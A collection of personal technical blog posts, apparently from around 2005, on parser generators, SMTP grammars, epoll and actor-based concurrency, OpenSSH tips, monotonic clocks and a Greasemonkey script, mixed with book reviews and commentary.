    That parses one-or-more TokenChars into a single Token. But that leaves you with a parse tree like this for the input POST: ['P', ['O', ['S', ['T']]]]. The key to this is reduction functions, which do something sensible with the parse tree as it's being generated. The above would be:

    Token = OneOrMore(TokenChar, string_)

    Where string_ is a special marker which says "It's a string, so give me something sensible in the parse tree". If nothing does what you need, you can define your own:

    Token = OneOrMore(TokenChar)
    def Token_reduce(values):
    	return ''.join(values)

    (and that does exactly the same thing.) Also, special forms like OneOrMore save you from thinking (too much) about how to write the grammar. OneOrMore is a simple case but something like Alternation(a, b) (a sequence of a, separated by b with optional bs at the beginning and end with reduction functions which give you a flat list of them) isn't.
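    To show what a reduction function saves you from, here is a standalone sketch that takes the right-recursive tree from above and flattens it after the fact. It is not the parser's actual machinery; both function names are made up for illustration.

```python
def flatten_right_recursive(tree):
    """Turn a nested [head, [head, [...]]] tree into a flat list of heads."""
    values = []
    while tree:
        values.append(tree[0])
        # The tail, if present, is the rest of the right-recursive chain.
        tree = tree[1] if len(tree) > 1 else None
    return values


def string_reduce(values):
    """Same job as the Token_reduce example: join the characters into one string."""
    return "".join(values)


if __name__ == "__main__":
    tree = ["P", ["O", ["S", ["T"]]]]
    print(string_reduce(flatten_right_recursive(tree)))
```

    Doing the reduction as the tree is built avoids ever materialising the nested form.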

    So that's the evangelising for now. People should use parser generators for network protocols because who the hell wants to write another damn HTTP parser by hand (which you'll probably screw up)?

    More tricks

    Parsing is good. But there are more state machines in network protocols than just parsing. Take SMTP:

    220 imperialviolet.org ESMTP
    MAIL FROM: foo@foo.com
    250 ok
    RCPT TO: bar@bar.net
    250 ok
    DATA
    354 go ahead
    Subject: testing
    
    Hello there!
    .
    250 ok 1114338782 qp 5232
    QUIT
    221 imperialviolet.org

    Here a valid conversation can't have a DATA after the RCPT TO if the RCPT TO failed. So you could have the parser working line-by-line and a higher level state machine tracking the valid commands at this point etc. (I would admit that a per-line generated parser for SMTP would be overkill.)

    So let us introduce two new terminals: T and ⊥ which are «command successful» and «command failed». We can inject these into the parser when we're finished processing a command and then define a conversation something like this:

    RCPTTO := RCPTTOCommand
    RCPTTO := RCPTTOCommand, ⊥, RCPTTO
    SMTPConversation := HELOCommand, T, MAILFROM, T, RCPTTO, T, DATA, T

    (That's not RFC at all, but humor me.) So a client can have as many failed RCPT TO commands as they like, but can't send a DATA command until one has completed. Thus, if the parser parsed it, it's a valid command and you don't need to keep track of the state yourself.
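    As a rough illustration of what that grammar accepts, here is a hand-written recogniser over an already-tokenised conversation. A generated parser would do this for you; the token names ("HELO", "MAILFROM" and so on) and the function name are assumptions made up for this sketch.

```python
OK, FAIL = "T", "⊥"  # the injected «command successful» / «command failed» terminals


def is_valid_conversation(tokens):
    """Check a token list against the SMTPConversation rule sketched above."""
    pos = 0

    def expect(token):
        nonlocal pos
        if pos < len(tokens) and tokens[pos] == token:
            pos += 1
            return True
        return False

    if not (expect("HELO") and expect(OK) and expect("MAILFROM") and expect(OK)):
        return False
    # RCPTTO := RCPTTOCommand | RCPTTOCommand, FAIL, RCPTTO
    if not expect("RCPTTO"):
        return False
    while expect(FAIL):
        if not expect("RCPTTO"):
            return False
    # The last RCPT TO must have succeeded before DATA is allowed.
    return expect(OK) and expect("DATA") and expect(OK) and pos == len(tokens)


if __name__ == "__main__":
    good = ["HELO", OK, "MAILFROM", OK, "RCPTTO", FAIL, "RCPTTO", OK, "DATA", OK]
    bad = ["HELO", OK, "MAILFROM", OK, "RCPTTO", FAIL, "DATA", OK]
    print(is_valid_conversation(good), is_valid_conversation(bad))
```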

    On Intelligence

    Review: On Intelligence, by Jeff Hawkins

    I finished this book with a sense of dissatisfaction. The author makes some fairly grandiose claims about advancing the state of AI and normally that would be the sign of a moonbat. However, I was impressed with what little I saw of his talk at Google last year.

    Sadly this book is very dilute. There is some good stuff in there but I think that his co-author (almost certainly forced on him by the publisher) had been told to water it down for a more lay audience. About half the paragraphs in the book need removing.

    There's something worthwhile in there. What I take away from this book is a resuscitated hope that there is a general algorithm for the brain. So many AI papers have claimed that their algorithm was the magic fairy dust that I, and others, had mostly given up on the whole venture - conceding that the brain was inelegant.

    But given the scant neurological evidence presented in the book what would have really sold me is a good computer implementation. He makes grand claims about the possibility of one without ever trying it out. There is something along those lines here, but nothing seems to be moving very fast.

    Maybe the ideas here will shape a future AI revolution, but the author isn't fanning the flames with this book.

    Directions in future languages - edge triggered IO

    This is a follow up to the actors model post, below. That was a fairly generic piece of advocacy and this is a specific demonstration of how to build a small part of such a system.

    In an actors model (in mine at least) actors only ever block on message receive. Blocking on I/O is not an option and so one uses all the usual techniques of setting O_NONBLOCK. One actor in the system is special, however, and blocks on an I/O multiplexing call (select, poll etc). This actor sends signals to other actors when interesting I/O is ready.

    So assume that the I/O actor is using select/poll to wait for events. Data arrives from the network, sending the descriptor high, and the poll call returns. The I/O actor fires a message off to the correct actor and carries on.

    However, the next poll call will return immediately because the other actor probably hasn't had a chance to perform a read and empty the kernel buffers yet. So the only option is to remove the descriptor from the set of `interesting' ones and force any actor which wants to do I/O to reenable it with a message as soon as they have finished reading.

    This is a mess as it involves lots of messages going back and forth. There is a better way.

    Recent multiplexing calls (epoll under Linux 2.6, kqueue under FreeBSD and realtime signals under Linux 2.4) have an edge triggered mode. In this mode the call only delivers events on a rising edge. So if a socket becomes readable it will tell you once. select and poll will tell you whenever the socket is readable.

    This is clearly ideal for an actors model. The I/O actor waits for edge notifications and sends messages. The descriptor doesn't need to be removed from the interesting set and another actor can read the data at its leisure.

    In the case of flow control even the descriptor need not be removed. An actor can just ignore the edge message if it doesn't currently want more data. In the future it can read until EAGAIN and then start waiting for edge messages again.

    Thus my actors which talk to a socket end up looking like this:

    def run(self):
    	send-message-to-io-actor-registering-my-interest-in-a-certain-fd()
    
    	while True:
    		if interested-in-reading-data:
    			read-data-until-EAGAIN()
    
    		message = receive-message()
    		if message == edge-notification-message:
    			continue
    		...
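    The edge-triggered behaviour itself is easy to see in isolation. The following is a minimal sketch, assuming Linux (select.epoll is not available elsewhere) and using a socketpair in place of a real network connection; the function names are made up for this example and there are no actors involved.

```python
import select
import socket


def drain(sock):
    """Read from a non-blocking socket until it would block (EAGAIN)."""
    chunks = []
    while True:
        try:
            data = sock.recv(4096)
        except BlockingIOError:
            break  # EAGAIN: the kernel buffer is empty
        if not data:
            break  # peer closed the connection
        chunks.append(data)
    return b"".join(chunks)


def edge_triggered_demo():
    """Return (events on first poll, events on second poll, data read)."""
    reader, writer = socket.socketpair()
    reader.setblocking(False)
    ep = select.epoll()
    try:
        ep.register(reader.fileno(), select.EPOLLIN | select.EPOLLET)
        writer.send(b"hello")
        first = ep.poll(0.1)   # reports the rising edge
        second = ep.poll(0.1)  # nothing new has arrived, so no event
        return len(first), len(second), drain(reader)
    finally:
        ep.close()
        reader.close()
        writer.close()


if __name__ == "__main__":
    print(edge_triggered_demo())
```

    With level-triggered polling the second poll would report the descriptor again, which is exactly the problem described above.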

    Directions in future languages - actor based concurrency

    What I'm looking for is a quote from Zooko about why any kind of preemptive or co-operative threading model is unsettling. I can't find one so I'm going to make it up:

    I don't like it because I can never be sure, from line to line, that the world hasn't just changed behind my back. -- not zooko

    Which is true; tragically so in preemptive systems and enough to keep you on your toes in syncthreaded (co-operative) ones. I've long said that it's far too easy to screw up preemptive multithreading with its locks, deadlocks, livelocks and super-intelligent-shade-of-the-colour-blue locks. Syncthreading quietens things down enough for me and yet lets you keep the same flow-of-control.

    (I like the flow-of-control. Fully asynchronous code with huge state-machines is a mess.)

    But I've just dumped syncthreading for an actors model in my current project - mostly for non-concurrency related reasons. (And certainly not because I have a compulsive disorder which causes me to dump and rewrite any code which is starting to work.)

    An actors model involves many threads co-operating via copy-everything message passing. It's an asynchronous pi-calculus if you like that sort of thing (which I don't). Copy-everything means no shared data and no locks. At all.

    The majority of threads are short classes (a couple of pages of Python) with a simple specification. They are nearly all small state-machines which return to the same point after each message. There's a single blocking function - recv which gets the next message.

    You break up threads in much the same way you break up functions. You get a feel for how much complexity should be contained in each one. The diagram on the right is taken from my project report at the moment - each block is an actor (and a single class) and they exchange messages with the other blocks that they're connected to. It may look a little complex, but that's smaller than the class inheritance diagrams in many systems.

    And the reasons for choosing it over syncthreading are a little odd for a concurrency model: modularity and unit testing.

    I like unit tests. I don't think there's a whole lot of disagreement about their utility so I'm going to leave it at this: unit tests good.

    It's always good and easy to write unit tests for some things - data structures are a prime choice. Lots of scope for silly errors and no side effects. You can write a good data-structure unit test and feel good about yourself.

    It's side effects which make unit tests difficult to write. If your code interacts with the outside world, chances are your unit tests are limited.

    And that's the wonderful thing about actors - almost nothing interacts with anything else directly. It's all via message passing and that's eminently controllable by unit tests. If you want to test your timeout logic in a unit test it's not a problem. Timeouts are just messages like anything else and you can send them in any order you choose.

    Likewise I'm fairly sure that the code ends up being naturally more reusable. For all the same reasons; a lack of direct external dependencies.
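    To make the testing point concrete, here is a toy sketch of an actor whose timeout logic can be driven entirely by hand-fed messages. It is single-threaded and much simpler than a real actor system; the class names, message shapes and retry policy are all invented for this example.

```python
from collections import deque


class Actor:
    """A minimal actor: a mailbox plus a handler, with no shared state."""

    def __init__(self):
        self.mailbox = deque()

    def send(self, message):
        self.mailbox.append(message)

    def run_until_idle(self):
        while self.mailbox:
            self.handle(self.mailbox.popleft())

    def handle(self, message):
        raise NotImplementedError


class RetryingRequester(Actor):
    """Sends a request and retries on timeout, giving up after max_attempts."""

    def __init__(self, outbox, max_attempts=3):
        super().__init__()
        self.outbox = outbox  # stands in for the actor we would message
        self.max_attempts = max_attempts
        self.attempts = 0
        self.state = "idle"

    def handle(self, message):
        kind = message[0]
        if kind == "start" and self.state == "idle":
            self._send_request()
        elif kind == "timeout" and self.state == "waiting":
            if self.attempts < self.max_attempts:
                self._send_request()
            else:
                self.state = "failed"
        elif kind == "reply" and self.state == "waiting":
            self.state = "done"

    def _send_request(self):
        self.attempts += 1
        self.state = "waiting"
        self.outbox.append(("request", self.attempts))


if __name__ == "__main__":
    outbox = []
    actor = RetryingRequester(outbox)
    # A timeout is just another message, so the test chooses when it "fires".
    for message in [("start",), ("timeout",), ("reply", "data")]:
        actor.send(message)
    actor.run_until_idle()
    print(actor.state, outbox)
```

    No clocks, sockets or sleeps are needed: the test decides the order of events.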

    My design is mostly taken from Erlang. There are a lot of links in the C2 wiki page but there was a very good talk about Erlang at the LL2 conference and they recorded it. It's real-media but mplayer copes with it for me.

    Market Forces

    Market Forces is from the same author as Altered Carbon. I read the latter some time ago and, although I quite enjoyed it, I didn't feel that I'd actually gained anything by the end of it. I'm quite happy just reading for pleasure but, with every book there's a scale of effect, from the profound to these two. These are deeply unimportant books.

    Market Forces is billed as some great anti-globalisation work and is meant to be about large multi-nationals who take sides in wars for a piece of the post-war pie. Frankly, our governments do this already and so the idea isn't very shocking.

    But the focus is on the lead character, Chris Faulkner, who is a rising star in this corporate world. The book also tries to be a character development story, charting how power corrupts - or something. I didn't ever feel that I understood or empathised with this character. His fall from grace seemed more a series of random acts than a warning shot that we can all be driven to immoral acts in a corrupting environment.

    And much of the action involves legal kill-or-be-killed car battles. These companies compete for deals by having the best drivers in a ritual combat. Why? I assume there's an answer in the author's head, but he certainly didn't write it down for the rest of us.

    DVD: Battlestar Galactica

    Battlestar Galactica [introduction mini-series][series 1] - yes it was that film that they show on TV at Christmas with the robot dog and the baddies who look like tin cans with the front of the Knight Rider car glued on. Forget it. This isn't a remake, it's a thousand times better.

    Although it has some of the same story elements as the original, this show has great writers, a great cast and looks beautiful. Watch it.

    In other news

    Welcome to Britain. As soon as it gets Royal Assent:

    • You can be arrested for any offense. Once arrested you have to give fingerprint and DNA samples which will be kept on record for ever.
    • You need written permission from the police commissioner (who answers to the Home Secretary) in order to protest within 1km of Parliament. That extends to cover Vauxhall Bridge, all of Waterloo, Trafalgar square and falls just shy of Hyde Park Corner.

    I suppose we should be thankful that the ID cards bill got dropped:

    "Labour's manifesto will confirm that the reintroduction of identity cards legislation will be an early priority after the election."

    Sony patent takes first step towards real-life Matrix. The described device seems very interesting and probably worthy of the patent ... if it worked. Quoting from that NS text:

    There were not any experiments done ... This particular patent was a prophetic invention. It was based on an inspiration that this may someday be the direction that technology will take us.

    And reminding ourselves about the requirements for a patent:

    An invention is the creation of a new technical concept and the physical means to implement or embody the idea. That physical means, prototype, or tangible form referred to as reduction to practice is what separates a discovery from an invention.

    So; yet another result of the super-secret US patent office source code: while 1: print 'granted'

    Fixing LCD subpixel hinting

    Subpixel hinting uses the fact that LCD displays have separate red-green-blue cells in order to triple the x resolution of the display, resulting in nicer fonts etc.

    However, this assumes that the system knows the ordering of the cells in the LCD, and this differs from system to system. If, when you look at your fonts, you see a red and blue tinge at the edges of vertical strokes, your font renderer has guessed wrong.

    In that case, drop this little file into your homedir as ~/.fonts.conf, restart programs and everything will be fixed. You're welcome.

    <?xml version="1.0"?>
    <!DOCTYPE fontconfig SYSTEM "fonts.dtd">
    <fontconfig>
           <match target="font">
                   <edit name="rgba" mode="assign"><const>bgr</const></edit>
           </match>
    </fontconfig>

    Gmail: still counting

    Google doubles GMail storage to 2GB - wrong. Should read "Google increases GMail storage to 2050MB and still counting".

    (Though looking at the page source suggests that it will stop at 2075MB)

    Why POSIX AIO has such a schizophrenic time

    The Linux AIO effort is doing pretty well. It now has kernel interfaces to handle the AIO calls and the performance is looking pretty good.

    Talking about AIO is often an odd experience because people don't realise that it does a completely different job to asynchronous network IO. There are two utterly separate problems that AIO can solve:

    • High performance IO: giving the kernel better information about future IO requests thus allowing it to order them for better throughput etc.
    • Issuing IO requests without blocking.

    Networking calls have always had a non-blocking option since Berkeley sockets. Filesystem IO has never had one for some reason. This leads to programs which either handle filesystem congestion very badly or resort to IO worker threads to try and cope in an otherwise single-threaded program.

    For an example of the first, try having an NFS mounted home directory when the network fails. Everything drops into disk-wait because all the filesystem calls block for many minutes.

    Networking calls have always been non-blocking because everyone knows that network calls can take ages to complete. But with the relative speed of modern CPUs/Memory against disks (and certainly network based filesystems) we really need non-blocking file IO.

    Sadly the POSIX AIO API only deals with the first problem. open, getdents etc calls still block.
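    The worker-thread workaround mentioned above looks roughly like this. It's a minimal sketch in Python using asyncio; blocking_read, read_file and demo are names made up for the illustration, and the temporary file only exists so that the example can run anywhere.

```python
import asyncio
import os
import tempfile


def blocking_read(path):
    # open() and read() can block for as long as the filesystem likes
    # (think of a hung NFS mount), so they run in a worker thread.
    with open(path, "rb") as f:
        return f.read()


async def read_file(path):
    loop = asyncio.get_running_loop()
    # Passing None selects the event loop's default thread pool.
    return await loop.run_in_executor(None, blocking_read, path)


def demo():
    # Write a small file, then read it back without blocking the event loop.
    with tempfile.NamedTemporaryFile(delete=False) as tmp:
        tmp.write(b"hello")
    try:
        return asyncio.run(read_file(tmp.name))
    finally:
        os.unlink(tmp.name)
```

    The event loop stays responsive while the read is pending, but only because a thread is parked in the kernel on its behalf. That's exactly the kind of contortion that real non-blocking file IO would make unnecessary.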

    So, kernel developers, quit tweaking little things. We want some real progress! Give us non-blocking file IO which works with epoll.

    Update: Something I didn't make clear. Non-blocking support is a stronger feature than high-performance support. If a kernel has non-blocking filesystem support it implies that it has high-performance support too.

    Future Battles

    I'm sure that everyone who uses Firefox (1.0.2, keeping up with the security releases, right?) has discovered AdBlock. A more useful plugin doesn't exist (well, maybe greasemonkey with some good scripts) but I think we can expect that AdBlock is going to work a whole lot worse quite soon.

    We've seen the efforts that some sites put into getting pop{up|under}s past blockers. They don't seem to be doing too well from my point of view, but maybe I just don't go to the right sites. Nonetheless, they are fighting a losing battle. Fundamentally the browser can stop Javascript on random sites from opening new windows - it's not rocket science.

    The battle AdBlock is fighting is the other way round. For the moment, many sites are neatly organised with all their adverts in a directory called /ads/, or from a host called advertising.com. This makes AdBlock work very well with simple pattern matching. But I soon expect that we'll see sites where every image is a random filename.
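    To show just how simple that matching is, here's a sketch in Python. The patterns and the is_blocked function are made up for illustration; this isn't AdBlock's actual filter syntax or code.

```python
from fnmatch import fnmatchcase

# Hypothetical filter list in the spirit of the examples above.
BLOCK_PATTERNS = [
    "*/ads/*",
    "*://advertising.com/*",
    "*://*.advertising.com/*",
]


def is_blocked(url, patterns=BLOCK_PATTERNS):
    # A URL is blocked if any wildcard pattern matches the whole URL.
    return any(fnmatchcase(url, pattern) for pattern in patterns)
```

    A URL like http://example.com/img/x7f3a9.gif matches none of these, which is the whole problem with randomised filenames.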

    What do we do then? We could use greasemonkey scripts to rewrite the webpage as we like, right? We could remove the adverts and we can get rid of non-image adverts too (which AdBlock currently doesn't).

    That's going to work for a while; probably a long time after AdBlock stops working due to the amount of effort required to create each script. Someone only needs to create it once, but there are a lot of websites and people will have to download and install these things etc.

    I don't expect it will work forever. There's a strange idea amongst people who call themselves "content producers" that it's wrong for you to view their content in any way other than as they intended it. (For examples see Odeon reacting to an excellent scrape and most of the anti Google Autolink stuff recently).

    It's more difficult to imagine how they're going to stop it but, as tools like greasemonkey become better, expect to see DOM obfuscators running in webservers. These will mess up the HTML differently for every GET request. The pages will look the same in a browser, but you won't be able to use nice class names and such to extract the bits you need.

    (The greasemonkey script below would be far more complex if Google didn't neatly put search results into their own class.)

    Within a few years I expect that we'll have AI-like filters to remove adverts and obfuscators+human workers doing their best to defeat them. Much as spam filters work today.

    But that's a ray of hope because the efforts put into spam filters have paid off. I get 30+ spam messages a day (after simple blacklist filtering which removes a lot) and Gmail's filters have a 0% false-positive rate and maybe 1-2% false-negative. That's very good.

    Dealing with too many config files

    I've finally got round to doing something about keeping all my config files in sync across the five different hosts that I ssh to regularly.

    I've created an SVN repository with my config files in it and symlinked the dot files to the checked-out version.

    .zprompt -> .aglconfig/agldotfiles/zprompt-green
    .zshrc -> .aglconfig/agldotfiles/zshrc
    .zlogin -> .aglconfig/agldotfiles/zlogin
    .zshenv -> .aglconfig/agldotfiles/zshenv
    .vimrc -> .aglconfig/agldotfiles/vimrc
    .gvimrc -> .aglconfig/agldotfiles/gvimrc
    ...

    I can now keep them synced across all the boxes and I've a little tarball in the repository as well which creates all the symlinks for me. I can borgify a new install with two commands now.
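    The symlinking step could equally be a small script. This is a sketch in Python rather than the tarball I actually use; link_dotfiles and the LINKS table are illustrative names, with the entries taken from the listing above.

```python
import os

# Dot file in the home directory -> file name inside the checkout.
LINKS = {
    ".zprompt": "zprompt-green",
    ".zshrc": "zshrc",
    ".zlogin": "zlogin",
    ".zshenv": "zshenv",
    ".vimrc": "vimrc",
    ".gvimrc": "gvimrc",
}


def link_dotfiles(home, checkout=os.path.join(".aglconfig", "agldotfiles"),
                  links=LINKS):
    """Create relative symlinks in `home`; return the names that were created."""
    created = []
    for dotfile, target in links.items():
        dest = os.path.join(home, dotfile)
        if os.path.lexists(dest):
            continue  # leave anything that already exists alone
        # The link target is relative to the directory containing the link.
        os.symlink(os.path.join(checkout, target), dest)
        created.append(dotfile)
    return created
```

    Running it twice is harmless: the second run finds every link already in place and creates nothing.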

    I should have done this years ago.

    The wonders of GreaseMonkey

    GreaseMonkey is a Firefox extension which allows you to install Javascript scripts which can manipulate webpages before they're displayed.

    You can see a list of GreaseMonkey scripts, but as a demo have a look at the one I cooked up below. It adds result numbers to Google search results and you can then select that result with a single keypress (press '1' for the first result etc).

    Type-ahead-find often goes pretty badly on search results because (you would hope) many of the results have all the same keywords in them.

    (If you have GreaseMonkey installed, you can install this script by following this link and selecting "Install User Script" from the Tools menu.)

    /*
    	Add one-press access keys to Google search results. Search results
    	are numbered in red and pressing 1..0 selects that search result.
    	A Firefox Greasemonkey script,
    	Version 0.1
    	Adam Langley <agl@imperialviolet.org>
    
    	Public Domain
    */
    
    // ==UserScript==
    // @name 			Google Searchkeys
    // @namespace 		http://www.imperialviolet.org
    // @description 	Adds one-press access keys to Google search results
    // @include 		http://www.google.*/search*
    // ==/UserScript==
    
    (function() {
    	// Search results are in p elements with a class of 'g'.
    	// This uses XPath to find all such elements and returns a
    	// snapshot. (A snapshot doesn't become invalid after changing
    	// the DOM.)
    	
    	var results = document.evaluate("//p[@class='g']", document, null, 
    			XPathResult.ORDERED_NODE_SNAPSHOT_TYPE, null);
    	var counter = 1;
    	
    	// We store the links in this array which is used by the keypress
    	// handler function
    	var links = new Array();
    	
    	for (var i = 0; i < results.snapshotLength; ++i) {
    		var result = results.snapshotItem(i);
    		// the first child of the paragraph is a comment element
    		// this is a little fragile, maybe should be an XPath lookup
    		links.push(result.firstChild.nextSibling.getAttribute("href"));
    
    		// We put the result number in a small-caps red span
    		var newspan = document.createElement("span");
    		newspan.setAttribute("style", "color:red; font-variant: small-caps;");
    		newspan.appendChild(document.createTextNode("Result " + counter++ + " "));
    		result.insertBefore(newspan, result.firstChild);
    	}
    
    	function keypress_handler(e) {
    		// e.which contains the ASCII char code of the
    		// key which was pressed
    		// see: http://web.archive.org/web/20040214161257/devedge.netscape.com/
    		// library/manuals/2000/javascript/1.3/reference/
    		// handlers.html#1120313
    		
    		var keypressed = String.fromCharCode(e.which);
    		if (keypressed < '0' || keypressed > '9') {
    			return true;
    		}
    
    		var resnum = e.which - "0".charCodeAt(0);
    		if (resnum == 0) {
    			resnum = 10;
    		}
    		if (resnum > links.length) {
    			// No such result on this page; let the key through
    			return true;
    		}
    		document.location = links[resnum - 1];
    
    		return false;
    	}
    
    	document.onkeydown = keypress_handler;
    })();
    
    
    

    OpenSSH: Old dog, new tricks

    OpenSSH has hit version 4.0 (and 4.0p) and with that comes at least one cool new feature: hostname hashing.

    If you (or anyone) cats ~/.ssh/known_hosts it lists all the hostnames of every host you ssh to. Probably not a big problem, but the new version of ssh lets you run ssh-keygen -H to hash all these values so that they look like:

    |1|bZ457JK38+Bee4NMHxZMmkMqyKg=|+J6sIIzIAoUirdxXwY04fBsb8QQ= ssh-rsa AAAAB3NzaC1y
    c2EAAAABIwAAAIEAljhZCk8u8rVqR7YdQxGGG7YBW0uDJq/s9J9hqZlHFs10dX1PHEYsQQf7GV5SB5qLI
    6bZcYTZ2OrBOQjlJdp7xPWqCdh3TGEfPUARf5K0tFYCBpFNXt9Fjb2gZDIxG/PAT+JZHJOh66u147QYMo
    J3s1MRBoXXm7tSmlwm+QeBcAE=

    This, obviously, is a fairly irreversible step. (ssh-keygen does make a backup, but the same file name is used for every backup, so it lasts, at most, until the next time ssh-keygen changes the known hosts file.) It also means that you have to use ssh-keygen -R to delete entries from now on.
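    For the curious, the hashed field has the form |1|salt|hash, where both parts are base64 and, to my understanding of the OpenSSH format, the hash is HMAC-SHA1 over the hostname keyed with the salt. A sketch in Python of how an entry can be generated and checked (hash_host and matches are my own illustrative names, not OpenSSH functions):

```python
import base64
import hashlib
import hmac
import os


def hash_host(hostname, salt=None):
    """Return a '|1|salt|hash' field for hostname, with a random 20-byte salt."""
    if salt is None:
        salt = os.urandom(20)
    digest = hmac.new(salt, hostname.encode("ascii"), hashlib.sha1).digest()
    return "|1|%s|%s" % (base64.b64encode(salt).decode("ascii"),
                         base64.b64encode(digest).decode("ascii"))


def matches(hashed_field, hostname):
    """Check whether hostname is the one hidden behind hashed_field."""
    parts = hashed_field.split("|")
    if len(parts) != 4 or parts[0] != "" or parts[1] != "1":
        return False
    salt = base64.b64decode(parts[2])
    expected = hmac.new(salt, hostname.encode("ascii"), hashlib.sha1).digest()
    return hmac.compare_digest(expected, base64.b64decode(parts[3]))
```

    So the hashing doesn't stop anyone from confirming a guess at a hostname; it only stops the file from being a ready-made list of them.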

    Other things that people should do more often: Use ssh-keygen -l and publish the fingerprint of hosts which you expect people to ssh to. Over the phone you can use the -B option to get a more readable version.

    Also, use ssh aliases. This is an old trick, but it saves a lot of typing of hostnames and usernames (if your username varies across boxes at all). Just put something like this into ~/.ssh/config:

    Host alias-name
    HostName long.hostname.of.the.host.com
    User optional-username

    Any option from man 5 ssh_config can go in there.

    Just how important is a monotonic clock?

    In discussions with Zooko I did a little test to see how important the addition of CLOCK_MONOTONIC really is.

    The alternative to using CLOCK_MONOTONIC is to have an itimer which increments a global, volatile counter at some number of Hz. You can do that with something like the following:

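    #include <signal.h>
    #include <string.h>
    #include <sys/time.h>

    /* Global tick counter, incremented by the SIGALRM handler. */
    static volatile sig_atomic_t ticks;
    static void sigalrm_handler(int sig) { (void) sig; ticks++; }

    /* In main(), or wherever the timer is started: */
    struct itimerval itv;
    memset(&itv, 0, sizeof(itv));
    itv.it_interval.tv_sec = 1;   /* one tick per second */
    itv.it_value.tv_sec = 1;

    struct sigaction sa;
    memset(&sa, 0, sizeof(sa));
    sa.sa_handler = sigalrm_handler;
    sigaction(SIGALRM, &sa, NULL);

    setitimer(ITIMER_REAL, &itv, NULL);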

    So I set up a test which tracks the difference between the true time elapsed (from CLOCK_MONOTONIC) and the global tick count. Firstly at 10Hz:

    Nsecs elapsed   Global tick count   Skew in global count
    3029049000      30                  0
    6061401000      60                  0
    9090753000      90                  0
    12120089000     120                 1
    15149773000     150                 1
    18178802000     180                 1
    21211143000     210                 2
    24240480000     240                 2
    27269822000     270                 2
    30299166000     300                 2
    33328513000     330                 3
    36357867000     360                 3
    39389203000     390                 3
    42418558000     420                 4
    45447899000     450                 4
    48477242000     480                 4
    51506593000     510                 5
    54537964000     540                 5
    57567285000     570                 5
    60596633000     600                 5
    63625987000     630                 6
    66655324000     660                 6
    69686677000     690                 6
    72716018000     720                 7
    75745363000     750                 7
    78774714000     780                 7
    81804702000     810                 8
    84854641000     840                 8
    87864766000     870                 8
    90894098000     900                 8
    93923444000     930                 9
    96952794000     960                 9
    99985163000     990                 9
    103014486000    1020                10

    So, after 100 seconds the counter is already one second off. That's pretty terrible. Trying it again at 1Hz gives better results. I'm not going to give the whole table here but the skew is about 1 second lost every 20 minutes. Still not great.
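    The skew figures can be reproduced from the other two columns. A sketch in Python, assuming the skew is the number of whole ticks that should have elapsed minus the ticks actually counted (tick_skew and skew_seconds are illustrative names):

```python
NSECS_PER_SEC = 1_000_000_000


def tick_skew(elapsed_ns, ticks, hz):
    """Ticks that should have fired in elapsed_ns, minus the ticks counted."""
    expected = elapsed_ns * hz // NSECS_PER_SEC
    return expected - ticks


def skew_seconds(elapsed_ns, ticks, hz):
    """The same skew expressed as seconds lost by the counter."""
    return tick_skew(elapsed_ns, ticks, hz) / hz
```

    For the last row of the 10Hz run, tick_skew(103014486000, 1020, 10) comes to 10 ticks, which is the one second lost.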

    Acroread 7 for Linux

    Hopefully this one will stay around for a little while longer: Acrobat Reader 7 for Linux. The last release disappeared very quickly.

    Why would you want this? Well, acroread is the best quality PDF renderer around, I'm afraid. It's big, statically linked and not very fast. But if you're reading a big PDF on screen it's probably worth it.

    (Note: once installed go to the Reader/intellinux directory and rename plug_ins to plug_ins_disabled. It starts much faster, takes less memory and I've no idea what all those plugins do since it seems to work just as well without.)

    Update: It was released to help "people in the Netherlands meet tax deadlines"

    SSL Libraries

    For anyone using OpenSSL for implementing SSL, can I suggest that you look at GnuTLS first? Actually, scratch that. Look at GnuTLS second, after you've seen what the state of the OpenSSL code and documentation is.

    I can't argue that GnuTLS has had the same level of inspection and bug hunting that OpenSSL has, and maybe that's a clincher, but it actually has good docs, with examples and everything. It's based on gcrypt (the core of gnupg I believe) and you're much less likely to screw up when using it than you are with OpenSSL.

    (I've no financial or other interest in GnuTLS; this is just from trying and giving up with OpenSSL over the last couple of days.)

    Monotonic Time

    How long has a monotonic clock been sitting in POSIX without me noticing? The lack of one has really bugged me in the past. gettimeofday is useless for many timekeeping tasks because it can jump backwards and forwards with the tides of daylight savings, NTP and switching timezones. One doesn't want every timeout to suddenly trigger because they're all `over an hour overdue', or (possibly worse) not trigger for an hour. Usually I use setitimer to increment a one second resolution counter and hope for the best.

    But behold! clock_gettime (go read the manpage) can be passed a CLOCK_MONOTONIC argument and on my system at least (2.6.11, glibc CVS Jan 2005) it's a system call which returns the current uptime of the system with nanosecond resolution. Fantastic.

    (Note: you need to link against librt.)
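    Here's a minimal sketch of the kind of timeout bookkeeping that this makes safe, in Python rather than C. time.monotonic() is Python's monotonic clock (on Linux it reads CLOCK_MONOTONIC via clock_gettime); the Deadline class is made up for illustration.

```python
import time


class Deadline:
    """A timeout measured on a clock that never jumps backwards or forwards."""

    def __init__(self, seconds, clock=time.monotonic):
        self._clock = clock
        self._expires = clock() + seconds

    def remaining(self):
        # Seconds left before expiry, never negative.
        return max(0.0, self._expires - self._clock())

    def expired(self):
        return self._clock() >= self._expires
```

    Typical use would be d = Deadline(30) followed by polling d.expired() or sleeping for d.remaining(). Because the clock is monotonic, an NTP step or a timezone change can't fire the timeout early or hold it up for an hour.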

    Is it really beyond the w...

    Is it really beyond the wit of sshd-authors to log an error message saying Rejecting login due to shell not being in /etc/shells?

    In fact, if such an event occurs the error message is Failed password which, when your password goes via PAM, via Kerberos 5, to a Windows Active Directory server, means it can really take quite a while to track down what the hell's wrong.

    Free Municipal WiFi

    Lessig writes a satirical reply to a bill on the desk of the governor of Pennsylvania which would prevent the state from funding free-to-use WiFi networks. I happen to think that Lessig's condemnation of this is ill-considered.

    I believe that some products don't work in a free market, while others should only ever be set up in one. National defence is an example of the first and Lessig is correct that street lighting probably is too. Lots of things are at the other end, luxury items most surely.

    It may be reasonable to worry that a bill which prevents the state from offering any service which could be provided privately is quite stupid, but this has been mixed up with the idea that telecoms companies are using the legislative process to destroy `competition' from the state in the broadband market. The latter feeling rests upon the assumption that it's a good idea for the state to offer free-to-use WiFi and Lessig's writings are being used to support that.

    So where is WiFi on the scale from national defence to chocolate cake? The closest example is mobile phone service. This isn't provided by the state, and I've never heard anyone suggest that it should be. Certainly this leads to some duplication of base stations, I'm sure. But more importantly it has led to better phone service through competition. Does anyone believe that the quality of service would be better, or the costs lower, if mobile phone service was provided by the state?

    So why should WiFi be `free'? (I've used the quotes because, of course, everyone is forced to pay for it; it's just mashed together with the rest of the local tax.)

